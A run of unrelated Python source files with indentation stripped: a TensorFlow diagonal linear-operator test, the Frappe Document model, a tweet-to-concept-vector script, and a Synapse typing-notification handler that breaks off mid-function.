is_self_adjoint=True if ensure_self_adjoint_and_pd else None,
is_positive_definite=True if ensure_self_adjoint_and_pd else None)
matrix = array_ops.matrix_diag(diag)
return operator, matrix
def test_assert_positive_definite_raises_for_zero_eigenvalue(self):
# Matrix with one positive eigenvalue and one zero eigenvalue.
with self.cached_session():
diag = [1.0, 0.0]
operator = linalg.LinearOperatorDiag(diag)
# is_self_adjoint should be auto-set for real diag.
self.assertTrue(operator.is_self_adjoint)
with self.assertRaisesOpError("non-positive.*not positive definite"):
operator.assert_positive_definite().run()
def test_assert_positive_definite_raises_for_negative_real_eigvalues(self):
with self.cached_session():
diag_x = [1.0, -2.0]
diag_y = [0., 0.] # Imaginary eigenvalues should not matter.
diag = math_ops.complex(diag_x, diag_y)
operator = linalg.LinearOperatorDiag(diag)
# is_self_adjoint should not be auto-set for complex diag.
self.assertTrue(operator.is_self_adjoint is None)
with self.assertRaisesOpError("non-positive real.*not positive definite"):
operator.assert_positive_definite().run()
@test_util.run_deprecated_v1
def test_assert_positive_definite_does_not_raise_if_pd_and_complex(self):
with self.cached_session():
x = [1., 2.]
y = [1., 0.]
diag = math_ops.complex(x, y) # Re[diag] > 0.
# Should not fail
linalg.LinearOperatorDiag(diag).assert_positive_definite().run()
def test_assert_non_singular_raises_if_zero_eigenvalue(self):
# Singlular matrix with one positive eigenvalue and one zero eigenvalue.
with self.cached_session():
diag = [1.0, 0.0]
operator = linalg.LinearOperatorDiag(diag, is_self_adjoint=True)
with self.assertRaisesOpError("Singular operator"):
operator.assert_non_singular().run()
@test_util.run_deprecated_v1
def test_assert_non_singular_does_not_raise_for_complex_nonsingular(self):
with self.cached_session():
x = [1., 0.]
y = [0., 1.]
diag = math_ops.complex(x, y)
# Should not raise.
linalg.LinearOperatorDiag(diag).assert_non_singular().run()
def test_assert_self_adjoint_raises_if_diag_has_complex_part(self):
with self.cached_session():
x = [1., 0.]
y = [0., 1.]
diag = math_ops.complex(x, y)
operator = linalg.LinearOperatorDiag(diag)
with self.assertRaisesOpError("imaginary.*not self-adjoint"):
operator.assert_self_adjoint().run()
@test_util.run_deprecated_v1
def test_assert_self_adjoint_does_not_raise_for_diag_with_zero_imag(self):
with self.cached_session():
x = [1., 0.]
y = [0., 0.]
diag = math_ops.complex(x, y)
operator = linalg.LinearOperatorDiag(diag)
# Should not raise
operator.assert_self_adjoint().run()
def test_scalar_diag_raises(self):
with self.assertRaisesRegexp(ValueError, "must have at least 1 dimension"):
linalg.LinearOperatorDiag(1.)
def test_broadcast_matmul_and_solve(self):
# These cannot be done in the automated (base test class) tests since they
# test shapes that tf.matmul cannot handle.
# In particular, tf.matmul does not broadcast.
with self.cached_session() as sess:
x = random_ops.random_normal(shape=(2, 2, 3, 4))
# This LinearOperatorDiag will be broadcast to (2, 2, 3, 3) during solve
# and matmul with 'x' as the argument.
diag = random_ops.random_uniform(shape=(2, 1, 3))
operator = linalg.LinearOperatorDiag(diag, is_self_adjoint=True)
self.assertAllEqual((2, 1, 3, 3), operator.shape)
# Create a batch matrix with the broadcast shape of operator.
diag_broadcast = array_ops.concat((diag, diag), 1)
mat = array_ops.matrix_diag(diag_broadcast)
self.assertAllEqual((2, 2, 3, 3), mat.get_shape()) # being pedantic.
operator_matmul = operator.matmul(x)
mat_matmul = math_ops.matmul(mat, x)
self.assertAllEqual(operator_matmul.get_shape(), mat_matmul.get_shape())
self.assertAllClose(*self.evaluate([operator_matmul, mat_matmul]))
operator_solve = operator.solve(x)
mat_solve = linalg_ops.matrix_solve(mat, x)
self.assertAllEqual(operator_solve.get_shape(), mat_solve.get_shape())
self.assertAllClose(*self.evaluate([operator_solve, mat_solve]))
def test_diag_matmul(self):
operator1 = linalg_lib.LinearOperatorDiag([2., 3.])
operator2 = linalg_lib.LinearOperatorDiag([1., 2.])
operator3 = linalg_lib.LinearOperatorScaledIdentity(
num_rows=2, multiplier=3.)
operator_matmul = operator1.matmul(operator2)
self.assertTrue(isinstance(
operator_matmul,
linalg_lib.LinearOperatorDiag))
self.assertAllClose([2., 6.], self.evaluate(operator_matmul.diag))
operator_matmul = operator2.matmul(operator1)
self.assertTrue(isinstance(
operator_matmul,
linalg_lib.LinearOperatorDiag))
self.assertAllClose([2., 6.], self.evaluate(operator_matmul.diag))
operator_matmul = operator1.matmul(operator3)
self.assertTrue(isinstance(
operator_matmul,
linalg_lib.LinearOperatorDiag))
self.assertAllClose([6., 9.], self.evaluate(operator_matmul.diag))
operator_matmul = operator3.matmul(operator1)
self.assertTrue(isinstance(
operator_matmul,
linalg_lib.LinearOperatorDiag))
self.assertAllClose([6., 9.], self.evaluate(operator_matmul.diag))
def test_diag_solve(self):
operator1 = linalg_lib.LinearOperatorDiag([2., 3.], is_non_singular=True)
operator2 = linalg_lib.LinearOperatorDiag([1., 2.], is_non_singular=True)
operator3 = linalg_lib.LinearOperatorScaledIdentity(
num_rows=2, multiplier=3., is_non_singular=True)
operator_solve = operator1.solve(operator2)
self.assertTrue(isinstance(
operator_solve,
linalg_lib.LinearOperatorDiag))
self.assertAllClose([0.5, 2 / 3.], self.evaluate(operator_solve.diag))
operator_solve = operator2.solve(operator1)
self.assertTrue(isinstance(
operator_solve,
linalg_lib.LinearOperatorDiag))
self.assertAllClose([2., 3 / 2.], self.evaluate(operator_solve.diag))
operator_solve = operator1.solve(operator3)
self.assertTrue(isinstance(
operator_solve,
linalg_lib.LinearOperatorDiag))
self.assertAllClose([3 / 2., 1.], self.evaluate(operator_solve.diag))
operator_solve = operator3.solve(operator1)
self.assertTrue(isinstance(
operator_solve,
linalg_lib.LinearOperatorDiag))
self.assertAllClose([2 / 3., 1.], self.evaluate(operator_solve.diag))
def test_diag_adjoint_type(self):
diag = [1., 3., 5., 8.]
operator = linalg.LinearOperatorDiag(diag, is_non_singular=True)
self.assertIsInstance(operator.adjoint(), linalg.LinearOperatorDiag)
def test_diag_cholesky_type(self):
diag = [1., 3., 5., 8.]
operator = linalg.LinearOperatorDiag(
diag,
is_positive_definite=True,
is_self_adjoint=True,
)
self.assertIsInstance(operator.cholesky(), linalg.LinearOperatorDiag)
def test_diag_inverse_type(self):
diag = [1., 3., 5., 8.]
operator = linalg.LinearOperatorDiag(diag, is_non_singular=True)
self.assertIsInstance(operator.inverse(), linalg.LinearOperatorDiag)
if __name__ == "__main__":
linear_operator_test_util.add_tests(LinearOperatorDiagTest)
test.main()
|
|
# Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import frappe
from frappe import _, msgprint
from frappe.utils import flt, cint, cstr, now
from frappe.modules import load_doctype_module
from frappe.model.base_document import BaseDocument
from frappe.model.naming import set_new_name
# once_only validation
# methods
def get_doc(arg1, arg2=None):
if isinstance(arg1, BaseDocument):
return arg1
elif isinstance(arg1, basestring):
doctype = arg1
else:
doctype = arg1.get("doctype")
controller = get_controller(doctype)
if controller:
return controller(arg1, arg2)
raise ImportError, arg1
_classes = {}
def get_controller(doctype):
if not doctype in _classes:
module = load_doctype_module(doctype)
classname = doctype.replace(" ", "")
if hasattr(module, classname):
_class = getattr(module, classname)
if issubclass(_class, Document):
_class = getattr(module, classname)
else:
raise ImportError, doctype
else:
raise ImportError, doctype
_classes[doctype] = _class
return _classes[doctype]
class Document(BaseDocument):
def __init__(self, arg1, arg2=None):
self.doctype = self.name = None
if arg1 and isinstance(arg1, basestring):
if not arg2:
# single
self.doctype = self.name = arg1
else:
self.doctype = arg1
if isinstance(arg2, dict):
# filter
self.name = frappe.db.get_value(arg1, arg2, "name")
if self.name is None:
raise frappe.DoesNotExistError, (arg1, arg2)
else:
self.name = arg2
self.load_from_db()
elif isinstance(arg1, dict):
super(Document, self).__init__(arg1)
self.init_valid_columns()
else:
# incorrect arguments. let's not proceed.
raise frappe.DataError("Document({0}, {1})".format(arg1, arg2))
def load_from_db(self):
if not getattr(self, "_metaclass", False) and self.meta.issingle:
self.update(frappe.db.get_singles_dict(self.doctype))
self.init_valid_columns()
self._fix_numeric_types()
else:
d = frappe.db.get_value(self.doctype, self.name, "*", as_dict=1)
if not d:
frappe.throw(("{0} {1} not found").format(_(self.doctype), self.name), frappe.DoesNotExistError)
self.update(d)
if self.name=="DocType" and self.doctype=="DocType":
from frappe.model.meta import doctype_table_fields
table_fields = doctype_table_fields
else:
table_fields = self.meta.get_table_fields()
for df in table_fields:
children = frappe.db.get_values(df.options,
{"parent": self.name, "parenttype": self.doctype, "parentfield": df.fieldname},
"*", as_dict=True, order_by="idx asc")
if children:
self.set(df.fieldname, children)
else:
self.set(df.fieldname, [])
def has_permission(self, permtype):
if getattr(self, "ignore_permissions", False):
return True
return frappe.has_permission(self.doctype, permtype, self)
def raise_no_permission_to(self, perm_type):
raise frappe.PermissionError("No permission to {} {} {}".format(perm_type, self.doctype, self.name or ""))
def insert(self, ignore_permissions=None):
if ignore_permissions!=None:
self.ignore_permissions = ignore_permissions
self.set("__islocal", True)
if not self.has_permission("create"):
self.raise_no_permission_to("create")
self._set_defaults()
self._set_docstatus_user_and_timestamp()
self.check_if_latest()
set_new_name(self)
self.run_method("before_insert")
self.set_parent_in_children()
self.run_before_save_methods()
self._validate()
# run validate, on update etc.
# parent
if getattr(self.meta, "issingle", 0):
self.update_single(self.get_valid_dict())
else:
self.db_insert()
# children
for d in self.get_all_children():
d.db_insert()
self.run_method("after_insert")
self.run_post_save_methods()
return self
def save(self, ignore_permissions=None):
if ignore_permissions!=None:
self.ignore_permissions = ignore_permissions
if self.get("__islocal") or not self.get("name"):
self.insert()
return
if not self.has_permission("write"):
self.raise_no_permission_to("save")
self._set_docstatus_user_and_timestamp()
self.check_if_latest()
self.set_parent_in_children()
self.run_before_save_methods()
self._validate()
# parent
if self.meta.issingle:
self.update_single(self.get_valid_dict())
else:
self.db_update()
# children
child_map = {}
ignore_children_type = self.get("ignore_children_type") or []
for d in self.get_all_children():
d.db_update()
child_map.setdefault(d.doctype, []).append(d.name)
for df in self.meta.get_table_fields():
if df.options not in ignore_children_type:
cnames = child_map.get(df.options) or []
if cnames:
frappe.db.sql("""delete from `tab%s` where parent=%s and parenttype=%s and
name not in (%s)""" % (df.options, '%s', '%s', ','.join(['%s'] * len(cnames))),
tuple([self.name, self.doctype] + cnames))
else:
frappe.db.sql("""delete from `tab%s` where parent=%s and parenttype=%s""" \
% (df.options, '%s', '%s'), (self.name, self.doctype))
self.run_post_save_methods()
return self
def update_single(self, d):
frappe.db.sql("""delete from tabSingles where doctype=%s""", self.doctype)
for field, value in d.iteritems():
if field != "doctype":
frappe.db.sql("""insert into tabSingles(doctype, field, value)
values (%s, %s, %s)""", (self.doctype, field, value))
def _set_docstatus_user_and_timestamp(self):
self._original_modified = self.modified
self.modified = now()
self.modified_by = frappe.session.user
if not self.creation:
self.creation = self.modified
if not self.owner:
self.owner = self.modified_by
if self.docstatus==None:
self.docstatus=0
for d in self.get_all_children():
d.docstatus = self.docstatus
d.modified = self.modified
d.modified_by = self.modified_by
if not d.owner:
d.owner = self.owner
if not d.creation:
d.creation = self.creation
def _validate(self):
self._validate_mandatory()
self._validate_links()
self._validate_constants()
for d in self.get_all_children():
d._validate_constants()
self._extract_images_from_text_editor()
def _set_defaults(self):
if frappe.flags.in_import:
return
new_doc = frappe.new_doc(self.doctype)
self.update_if_missing(new_doc)
# children
for df in self.meta.get_table_fields():
new_doc = frappe.new_doc(df.options)
value = self.get(df.fieldname)
if isinstance(value, list):
for d in value:
d.update_if_missing(new_doc)
def check_if_latest(self):
conflict = False
self._action = "save"
if not self.get('__islocal'):
if self.meta.issingle:
modified = frappe.db.get_value(self.doctype, self.name, "modified")
if cstr(modified) and cstr(modified) != cstr(self._original_modified):
conflict = True
else:
tmp = frappe.db.get_value(self.doctype, self.name,
["modified", "docstatus"], as_dict=True)
if not tmp:
frappe.throw(_("Record does not exist"))
modified = cstr(tmp.modified)
if modified and modified != cstr(self._original_modified):
conflict = True
self.check_docstatus_transition(tmp.docstatus)
if conflict:
frappe.msgprint(_("Error: Document has been modified after you have opened it") \
+ (" (%s, %s). " % (modified, self.modified)) \
+ _("Please refresh to get the latest document."),
raise_exception=frappe.TimestampMismatchError)
else:
self.check_docstatus_transition(0)
def check_docstatus_transition(self, docstatus):
if not self.docstatus:
self.docstatus = 0
if docstatus==0:
if self.docstatus==0:
self._action = "save"
elif self.docstatus==1:
self._action = "submit"
if not self.has_permission("submit"):
self.raise_no_permission_to("submit")
else:
raise frappe.DocstatusTransitionError("Cannot change docstatus from 0 to 2")
elif docstatus==1:
if self.docstatus==1:
self._action = "update_after_submit"
self.validate_update_after_submit()
if not self.has_permission("submit"):
self.raise_no_permission_to("submit")
elif self.docstatus==2:
self._action = "cancel"
if not self.has_permission("cancel"):
self.raise_no_permission_to("cancel")
else:
raise frappe.DocstatusTransitionError("Cannot change docstatus from 1 to 0")
elif docstatus==2:
raise frappe.ValidationError
def set_parent_in_children(self):
for d in self.get_all_children():
d.parent = self.name
d.parenttype = self.doctype
def validate_update_after_submit(self):
if getattr(self, "ignore_validate_update_after_submit", False):
return
self._validate_update_after_submit()
for d in self.get_all_children():
d._validate_update_after_submit()
# TODO check only allowed values are updated
def _validate_mandatory(self):
if self.get("ignore_mandatory"):
return
missing = self._get_missing_mandatory_fields()
for d in self.get_all_children():
missing.extend(d._get_missing_mandatory_fields())
if not missing:
return
for fieldname, msg in missing:
msgprint(msg)
raise frappe.MandatoryError(", ".join((each[0] for each in missing)))
def _validate_links(self):
if self.get("ignore_links"):
return
invalid_links = self.get_invalid_links()
for d in self.get_all_children():
invalid_links.extend(d.get_invalid_links())
if not invalid_links:
return
msg = ", ".join((each[2] for each in invalid_links))
frappe.throw(_("Could not find {0}").format(msg),
frappe.LinkValidationError)
def get_all_children(self, parenttype=None):
ret = []
for df in self.meta.get("fields", {"fieldtype": "Table"}):
if parenttype:
if df.options==parenttype:
return self.get(df.fieldname)
value = self.get(df.fieldname)
if isinstance(value, list):
ret.extend(value)
return ret
def _extract_images_from_text_editor(self):
from frappe.utils.file_manager import extract_images_from_html
if self.doctype != "DocType":
for df in self.meta.get("fields", {"fieldtype":"Text Editor"}):
extract_images_from_html(self, df.fieldname)
def run_method(self, method, *args, **kwargs):
"""run standard triggers, plus those in frappe"""
if hasattr(self, method):
fn = lambda self, *args, **kwargs: getattr(self, method)(*args, **kwargs)
fn.__name__ = method.encode("utf-8")
return Document.hook(fn)(self, *args, **kwargs)
def submit(self):
self.docstatus = 1
self.save()
def cancel(self):
self.docstatus = 2
self.save()
def run_before_save_methods(self):
if getattr(self, "ignore_validate", False):
return
if self._action=="save":
self.run_method("validate")
self.run_method("before_save")
elif self._action=="submit":
self.run_method("validate")
self.run_method("before_submit")
elif self._action=="cancel":
self.run_method("before_cancel")
elif self._action=="update_after_submit":
self.run_method("before_update_after_submit")
def run_post_save_methods(self):
if self._action=="save":
self.run_method("on_update")
elif self._action=="submit":
self.run_method("on_update")
self.run_method("on_submit")
elif self._action=="cancel":
self.run_method("on_cancel")
elif self._action=="update_after_submit":
self.run_method("on_update_after_submit")
@staticmethod
def hook(f):
def add_to_return_value(self, new_return_value):
if isinstance(new_return_value, dict):
if not self.get("_return_value"):
self._return_value = {}
self._return_value.update(new_return_value)
else:
self._return_value = new_return_value or self.get("_return_value")
def compose(fn, *hooks):
def runner(self, method, *args, **kwargs):
add_to_return_value(self, fn(self, *args, **kwargs))
for f in hooks:
add_to_return_value(self, f(self, method, *args, **kwargs))
return self._return_value
return runner
def composer(self, *args, **kwargs):
hooks = []
method = f.__name__
doc_events = frappe.get_hooks("doc_events", {})
for handler in doc_events.get(self.doctype, {}).get(method, []) \
+ doc_events.get("*", {}).get(method, []):
hooks.append(frappe.get_attr(handler))
composed = compose(f, *hooks)
return composed(self, method, *args, **kwargs)
return composer
def validate_value(self, fieldname, condition, val2, doc=None, raise_exception=None):
"""check that value of fieldname should be 'condition' val2
else throw exception"""
error_condition_map = {
"in": _("one of"),
"not in": _("none of"),
"^": _("beginning with"),
}
if not doc:
doc = self
df = doc.meta.get_field(fieldname)
val1 = doc.get(fieldname)
if df.fieldtype in ("Currency", "Float"):
val1 = flt(val1, self.precision(df.fieldname, doc.parentfield or None))
val2 = flt(val2, self.precision(df.fieldname, doc.parentfield or None))
elif df.fieldtype in ("Int", "Check"):
val1 = cint(val1)
val2 = cint(val2)
elif df.fieldtype in ("Data", "Text", "Small Text", "Long Text",
"Text Editor", "Select", "Link"):
val1 = cstr(val1)
val2 = cstr(val2)
if not frappe.compare(val1, condition, val2):
label = doc.meta.get_label(fieldname)
condition_str = error_condition_map.get(condition, condition)
if doc.parentfield:
msg = _("Incorrect value in row {0}: {1} must be {2} {3}".format(doc.idx, label, condition_str, val2))
else:
msg = _("Incorrect value: {1} must be {2} {3}".format(label, condition_str, val2))
# raise passed exception or True
msgprint(msg, raise_exception=raise_exception or True)
def validate_table_has_rows(self, parentfield, raise_exception=None):
if not (isinstance(self.get(parentfield), list) and len(self.get(parentfield)) > 0):
label = self.meta.get_label(parentfield)
frappe.throw(_("Table {0} cannot be empty").format(label), raise_exception or frappe.EmptyTableError)
def round_floats_in(self, doc, fieldnames=None):
if not fieldnames:
fieldnames = (df.fieldname for df in
doc.meta.get("fields", {"fieldtype": ["in", ["Currency", "Float"]]}))
for fieldname in fieldnames:
doc.set(fieldname, flt(doc.get(fieldname), self.precision(fieldname, doc.parentfield)))
def precision(self, fieldname, parentfield=None):
from frappe.model.meta import get_field_precision
if parentfield and not isinstance(parentfield, basestring):
parentfield = parentfield.parentfield
if not hasattr(self, "_precision"):
self._precision = frappe._dict({
"default": cint(frappe.db.get_default("float_precision")) or 3,
"options": {}
})
if self._precision.setdefault(parentfield or "main", {}).get(fieldname) is None:
meta = frappe.get_meta(self.meta.get_field(parentfield).options if parentfield else self.doctype)
df = meta.get_field(fieldname)
if df.fieldtype == "Currency" and df.options and not self._precision.options.get(df.options):
self._precision.options[df.options] = get_field_precision(df, self)
if df.fieldtype == "Currency":
self._precision[parentfield or "main"][fieldname] = cint(self._precision.options.get(df.options)) or \
self._precision.default
elif df.fieldtype == "Float":
self._precision[parentfield or "main"][fieldname] = self._precision.default
return self._precision[parentfield or "main"][fieldname]
|
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
"""
go through user cleaned monthly tweets (MO_tweets.dat) and create user monthly CVs (MO_CV.json)
need access to MongoDB for individual word CVs. Both, input and output are .json txt files.
"""
import sys, io, json, os
import pymongo
from pymongo import MongoClient
from nltk.stem.snowball import SnowballStemmer
from collections import defaultdict, OrderedDict
import math
import codecs
import logging
import traceback
import multiprocessing
import functools
from itertools import repeat
import numpy as np
# used for our Wiki SR database querying. We saved CVs for stemmed words for better accuracy.
STEMMER = SnowballStemmer("english", ignore_stopwords=True )
# where we work
IN_DIR = "../../../DATA/General/"
# Mongo collections
CV = ""
AID7s = ""
# this global dictionary will change for each month MO
USR_TWEETS = defaultdict(int)
# .json input and output
F_IN_NAME = "_tweets.dat"
F_OUT_CV_NAME = "_CV.json"
# I put this here in order to cache the word CVs
# so to reduce the number of queries to MongoDB
words_CVs_lst = defaultdict(int)
#############################################################################################
# take the right collection = TF-IDF based concept vectors (CV) based on Wiki
#############################################################################################
def set_global_conn_params(client = MongoClient(), dbs="test", CV_collection="CV_stemmed_pruned",
aid_collection="AID"):
global CV, AID7s
# connect to Mongo db test
db = client[dbs]
CV = db[CV_collection]
AID7s = db[aid_collection]
#############################################################################################
# read in monthly user tweets from the right file (one per each month,
# created by ""monthly_user_tweets_clean_2_json.py)
#############################################################################################
def read_in_monthly_user_tweets(MO):
f = codecs.open(str(MO) + F_IN_NAME, "r")
for line in f:
line7s = json.loads(line)
user = line7s["_id"]
tweets_text = line7s["txt"]
count = line7s["count"]
USR_TWEETS[user] = defaultdict(int)
USR_TWEETS[user]["text"] = tweets_text
USR_TWEETS[user]["count"] = count
f.close()
def stem_word(token):
return STEMMER.stem( token )
# given two vectors as dictionaries with *ANY* sets of keys
# return their cosine similarity *vectors may be of ANY dim*
# cosine sim (v1,v2) = v1.v2 / ||v1|| ||v2||
def cosine_2_vectors(v1, v2):
# numerator for the cosine formula
SR_num = 0.0
# two denominator terms in the formula
v1_sq_sum = 0.0
v2_sq_sum = 0.0
keys_1 = set(v1.keys())
#print len(keys_1)
keys_2 = set(v2.keys())
#print len(keys_2)
# separate the different keys and common keys
different2_keys = keys_2 - keys_1
different1_keys = keys_1 - keys_2
common_keys = keys_1 & keys_2
#print len(common_keys), common_keys
# for common keys, we calculate formula as is
# SR = v1.v2 / ||v1|| ||v2||
for term in common_keys:
v1_fq = v1[term]
v2_fq = v2[term]
SR_num += v1_fq * v2_fq
v1_sq_sum += v1_fq * v1_fq
v2_sq_sum += v2_fq * v2_fq
# for different keys, we just take resepective non-zero
# dict terms for calculating denominator (nominator is zero)
for term in different1_keys:
v1_fq = v1[term]
v1_sq_sum += v1_fq * v1_fq
for term in different2_keys:
v2_fq = v2[term]
v2_sq_sum += v2_fq * v2_fq
# sum all in denominator and sqrt in the end
SR_den = math.sqrt(v1_sq_sum*v2_sq_sum)
try:
SR = SR_num/SR_den
except ZeroDivisionError:
SR = 0
return SR
# extract the CV vector in the form for calculation with true ids for articles
def extract_word_CV(w):
vec = defaultdict(int)
w = stem_word(w)
cv = CV.find_one({"_id": w})
if cv == None:
return None
v = cv['CV']
if v == None:
return None
for el in v: # can code better this part ?
for key, value in el.iteritems():
vec[value[1]] = float(value[0])
#return OrderedDict(sorted(vec.items(), key=lambda x: x[1], reverse= False))
return vec
# this function outputs a dictionary with {stemmed(word): fq} pairs
def stem_text_corpus(txt):
stemmed_text = defaultdict(int)
for el in txt:
for word, fq in el.iteritems():
stemmed_word = stem_word(word)
stemmed_text[stemmed_word] += int(fq)
return stemmed_text
# for given user, if a word in his text is in the global cached words_CVs_lst, take it,
# otherwise extract from MongoDB and add to the global cache; and then calculate his CV
def calculate_user_CV(userA):
# from read in users cleaned tweets with frequencies
A = USR_TWEETS[userA]
#print A
txtA = A['text']
num_tweets = A['count']
txt_fq_dist = stem_text_corpus(txtA)
CV_txt = defaultdict(int)
for word, fq in txt_fq_dist.iteritems():
# simple code
if words_CVs_lst[word]:
cv_word = words_CVs_lst[word]
else:
# expensive step going to Mongo
cv_word = extract_word_CV(word)
words_CVs_lst[word] = cv_word
if cv_word:
for concept, tf_idf in cv_word.iteritems():
CV_txt[concept] += tf_idf * fq
if not CV_txt or not CV_txt.values():
print userA
return OrderedDict(sorted(CV_txt.items(), key=lambda x: x[1], reverse= True)), num_tweets #normalize -- will do in the pruning step
# we prune CVs according to the original algorithms and save them to the given f output file
def prune_CV_and_dump(userA, num_tweets, CV_userA, f, threshold = 0.005, window = 100):
N = len(CV_userA.items())
CNT = 0
chck_pruning = 0
CV_dict = {}
CV_dict['_id'] = userA
CV_dict['num_tweets'] = num_tweets
CV_dict['CV'] = []
vec = CV_userA.values()
# HOWTO take the first element from OrderedDict already
if not vec:
return
highest_scoring_concept = max(vec)
highest_scoring_concept_pct = highest_scoring_concept * threshold
remembered_tfidf = highest_scoring_concept
remembered_id = 0
k = 0
for (concept, tfidf) in CV_userA.iteritems():
CNT += 1
k += 1
tfidf_dict = {}
tfidf_dict[concept] = str(tfidf)
CV_dict['CV'].append(tfidf_dict)
if k >= window:
if remembered_tfidf - tfidf < highest_scoring_concept_pct:
chck_pruning += (len(CV_userA.items()) - k)
break
else:
remembered_id += 1
remembered_tfidf = np.sort(vec)[::-1][remembered_id]
CV_new = OrderedDict(sorted(CV_dict.items(), key=lambda x: x[1], reverse= False))
f.write(unicode(json.dumps(CV_new, ensure_ascii=False)) + '\n')
if __name__ == "__main__":
set_global_conn_params()
os.chdir(IN_DIR)
ss = 0
# go for all the 7 months we have the data for
# May until Nov
for MO in [10]:
read_in_monthly_user_tweets(MO)
print "read in ", str(MO)
with codecs.open(str(MO) + F_OUT_CV_NAME, 'w', encoding='utf-8') as f:
for userA in USR_TWEETS:
print userA
ss += 1
if ss % 1000 == 0:
print ss, userA
CV_userA, num_tweets = calculate_user_CV(userA)
#print CV_userA, num_tweets
prune_CV_and_dump(userA, num_tweets, CV_userA, f, threshold = 0.005, window = 100)
f.close()
|
|
# -*- coding: utf-8 -*-
# Copyright 2014, 2015 OpenMarket Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from twisted.internet import defer
from ._base import BaseHandler
from synapse.api.errors import SynapseError, AuthError
from synapse.util.logcontext import PreserveLoggingContext
from synapse.types import UserID
import logging
from collections import namedtuple
logger = logging.getLogger(__name__)
# A tiny object useful for storing a user's membership in a room, as a mapping
# key
RoomMember = namedtuple("RoomMember", ("room_id", "user"))
class TypingNotificationHandler(BaseHandler):
def __init__(self, hs):
super(TypingNotificationHandler, self).__init__(hs)
self.homeserver = hs
self.clock = hs.get_clock()
self.federation = hs.get_replication_layer()
self.federation.register_edu_handler("m.typing", self._recv_edu)
hs.get_distributor().observe("user_left_room", self.user_left_room)
self._member_typing_until = {} # clock time we expect to stop
self._member_typing_timer = {} # deferreds to manage theabove
# map room IDs to serial numbers
self._room_serials = {}
self._latest_room_serial = 0
# map room IDs to sets of users currently typing
self._room_typing = {}
def tearDown(self):
"""Cancels all the pending timers.
Normally this shouldn't be needed, but it's required from unit tests
to avoid a "Reactor was unclean" warning."""
for t in self._member_typing_timer.values():
self.clock.cancel_call_later(t)
@defer.inlineCallbacks
def started_typing(self, target_user, auth_user, room_id, timeout):
if not self.hs.is_mine(target_user):
raise SynapseError(400, "User is not hosted on this Home Server")
if target_user != auth_user:
raise AuthError(400, "Cannot set another user's typing state")
yield self.auth.check_joined_room(room_id, target_user.to_string())
logger.debug(
"%s has started typing in %s", target_user.to_string(), room_id
)
until = self.clock.time_msec() + timeout
member = RoomMember(room_id=room_id, user=target_user)
was_present = member in self._member_typing_until
if member in self._member_typing_timer:
self.clock.cancel_call_later(self._member_typing_timer[member])
def _cb():
logger.debug(
"%s has timed out in %s", target_user.to_string(), room_id
)
self._stopped_typing(member)
self._member_typing_until[member] = until
self._member_typing_timer[member] = self.clock.call_later(
timeout / 1000.0, _cb
)
if was_present:
# No point sending another notification
defer.returnValue(None)
yield self._push_update(
room_id=room_id,
user=target_user,
typing=True,
)
@defer.inlineCallbacks
def stopped_typing(self, target_user, auth_user, room_id):
if not self.hs.is_mine(target_user):
raise SynapseError(400, "User is not hosted on this Home Server")
if target_user != auth_user:
raise AuthError(400, "Cannot set another user's typing state")
yield self.auth.check_joined_room(room_id, target_user.to_string())
logger.debug(
"%s has stopped typing in %s", target_user.to_string(), room_id
)
member = RoomMember(room_id=room_id, user=target_user)
if member in self._member_typing_timer:
self.clock.cancel_call_later(self._member_typing_timer[member])
del self._member_typing_timer[member]
yield self._stopped_typing(member)
@defer.inlineCallbacks
def user_left_room(self, user, room_id):
if self.hs.is_mine(user):
member = RoomMember(room_id=room_id, user=user)
yield self._stopped_typing(member)
@defer.inlineCallbacks
def _stopped_typing(self, member):
if member not in self._member_typing_until:
# No point
defer.returnValue(None)
yield self._push_update(
room_id=member.room_id,
user=member.user,
typing=False,
)
del self._member_typing_until[member]
if member in self._member_typing_timer:
# Don't cancel it - either it already expired, or the real
# stopped_typing() will cancel it
del self._member_typing_timer[member]
@defer.inlineCallbacks
def _push_update(self, room_id, user, typing):
localusers = set()
remotedomains = set()
rm_handler = self.homeserver.get_handlers().room_member_handler
yield rm_handler.fetch_room_distributions_into(
room_id, localusers=localusers, remotedomains=remotedomains
)
if localusers:
self._push_update_local(
room_id=room_id,
user=user,
typing=typing
)
deferreds = []
for domain in remotedomains:
deferreds.append(self.federation.send_edu(
destination=domain,
edu_type="m.typing",
content={
"room_id": room_id,
"user_id": user.to_string(),
"typing": typing,
},
))
yield defer.DeferredList(deferreds, consumeErrors=True)
@defer.inlineCallbacks
def _recv_edu(self, origin, content):
room_id = content["room_id"]
user = UserID.from_string(content["user_id"])
localusers = set()
rm_handler = self.homeserver.get_handlers().room_member_handler
yield rm_handler.fetch_room_distributions_into(
room_id, localusers=localusers
)
if localusers:
self._push_update_local(
room_id=room_id,
user=user,
typing=content["typing"]
)
def _push_update_local(self, room_id, user, typing):
if room_id not in self._room_serials:
self._room_serials[room_id] = 0
self._room_typing[room_id] = set()
room_set = self._room_typing[room_id]
if typing:
room_set.add(user)
elif user in room_set:
room_set.remove(user)
self._latest_room_serial += 1
self._room_serials[room_id] = self._latest_room_serial
with PreserveLoggingContext():
self.notifier.on_new_user_event(
"typing_key", self._latest_room_serial, rooms=[room_id]
)
class TypingNotificationEventSource(object):
def __init__(self, hs):
self.hs = hs
self._handler = None
self._room_member_handler = None
def handler(self):
# Avoid cyclic dependency in handler setup
if not self._handler:
self._handler = self.hs.get_handlers().typing_notification_handler
return self._handler
def room_member_handler(self):
if not self._room_member_handler:
self._room_member_handler = self.hs.get_handlers().room_member_handler
return self._room_member_handler
def _make_event_for(self, room_id):
typing = self.handler()._room_typing[room_id]
return {
"type": "m.typing",
"room_id": room_id,
"content": {
"user_ids": [u.to_string() for u in typing],
},
}
@defer.inlineCallbacks
def get_new_events_for_user(self, user, from_key, limit):
from_key = int(from_key)
handler = self.handler()
joined_room_ids = (
yield self.room_member_handler().get_joined_rooms_for_user(user)
)
events = []
for room_id in handler._room_serials:
if room_id not in joined_room_ids:
continue
if handler._room_serials[room_id] <= from_key:
continue
events.append(self._make_event_for(room_id))
